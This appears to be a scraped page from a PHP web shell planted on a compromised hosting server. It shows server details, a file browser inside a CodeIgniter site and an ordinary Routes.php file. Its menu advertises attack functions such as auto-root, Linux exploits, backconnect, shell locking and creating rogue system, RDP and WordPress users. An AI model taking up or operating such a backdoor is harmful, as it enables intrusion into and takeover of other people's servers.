Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.217.2
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
mlm.tradesense.co.ke /
system /
Config /
[ HOME SHELL ]
Name
Size
Permission
Action
AutoloadConfig.php
5.38
KB
-rw-r--r--
BaseConfig.php
6.61
KB
-rw-r--r--
BaseService.php
12.47
KB
-rw-r--r--
Config.php
1.11
KB
-rw-r--r--
DotEnv.php
6.72
KB
-rw-r--r--
Factories.php
9.7
KB
-rw-r--r--
Factory.php
1.08
KB
-rw-r--r--
ForeignCharacters.php
7.84
KB
-rw-r--r--
Publisher.php
1.13
KB
-rw-r--r--
Routes.php
1.24
KB
-rw-r--r--
Services.php
19.25
KB
-rw-r--r--
View.php
3.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Routes.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ use CodeIgniter\Exceptions\PageNotFoundException; /* * System URI Routing * * This file contains any routing to system tools, such as command-line * tools for migrations, etc. * * It is called by Config\Routes, and has the $routes RouteCollection * already loaded up and ready for us to use. */ // Prevent access to BaseController $routes->add('BaseController(:any)', static function () { throw PageNotFoundException::forPageNotFound(); }); // Prevent access to initController method $routes->add('(:any)/initController', static function () { throw PageNotFoundException::forPageNotFound(); }); // Migrations $routes->cli('migrations/(:segment)/(:segment)', '\CodeIgniter\Commands\MigrationsCommand::$1/$2'); $routes->cli('migrations/(:segment)', '\CodeIgniter\Commands\MigrationsCommand::$1'); $routes->cli('migrations', '\CodeIgniter\Commands\MigrationsCommand::index'); // CLI Catchall - uses a _remap to call Commands $routes->cli('ci(:any)', '\CodeIgniter\CLI\CommandRunner::index/$1');
Close